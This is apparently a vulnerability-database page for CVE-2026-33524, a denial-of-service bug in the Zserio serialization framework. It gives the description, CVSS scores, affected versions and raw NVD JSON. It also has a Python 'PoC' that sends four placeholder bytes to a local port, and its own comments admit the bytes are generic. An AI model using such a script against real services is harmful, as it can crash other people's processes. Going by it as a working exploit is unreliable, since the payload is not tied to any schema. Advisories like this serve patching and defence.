Security Vulnerability Report

CVE-2026-33524

Published: 2026-04-24 19:17:10
Last Modified: 2026-04-28 18:33:02

Description

Zserio is a framework for serializing structured data in a compact and efficient way with low overhead. Prior to 2.18.1, a crafted payload as small as 4-5 bytes can force memory allocations of up to 16 GB, crashing any process with an OOM error (Denial of Service). This vulnerability is fixed in 2.18.1.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nds-association:zserio:*:*:*:*:*:*:*:* - VULNERABLE
Zserio < 2.18.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# PoC for CVE-2026-33524
# This script sends a crafted payload to trigger OOM in vulnerable Zserio instances.
# Note: The actual bytes depend on the specific Zserio schema being targeted.
# This is a generic representation of the "4-5 bytes" payload mentioned.

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 8080

# Placeholder for the malicious bytes.
# In a real scenario, these bytes would align with a schema field that triggers the allocation bug.
# Example: A length field set to 0xFFFFFFFF interpreted as a signed -1 or huge unsigned int.
crafted_payload = b"\x00\x00\x00\xFF"


def exploit():
    try:
        print(f"[*] Sending payload to {TARGET_HOST}:{TARGET_PORT}...")
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((TARGET_HOST, TARGET_PORT))
            s.sendall(crafted_payload)
        print("[+] Payload sent. Check if the target process crashed due to OOM.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit()

References

https://github.com/ndsev/zserio/security/advisories/GHSA-cwq5-8pvq-j65j (Vendor Advisory; tagged Exploit, Mitigation)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33524", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:09.850", "lastModified": "2026-04-28T18:33:01.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zserio is a framework for serializing structured data with a compact and efficient way with low overhead. Prior to 2.18.1, a crafted payload as small as 4-5 bytes can force memory allocations of up to 16 GB, crashing any process with an OOM error (Denial of Service). This vulnerability is fixed in 2.18.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nds-association:zserio:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.18.1", "matchCriteriaId": "5488B9D1-04B2-459B-BE23-2FF4A91D12CF"}]}]}], "references": [{"url": "https://github.com/ndsev/zserio/security/advisories/GHSA-cwq5-8pvq-j65j", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}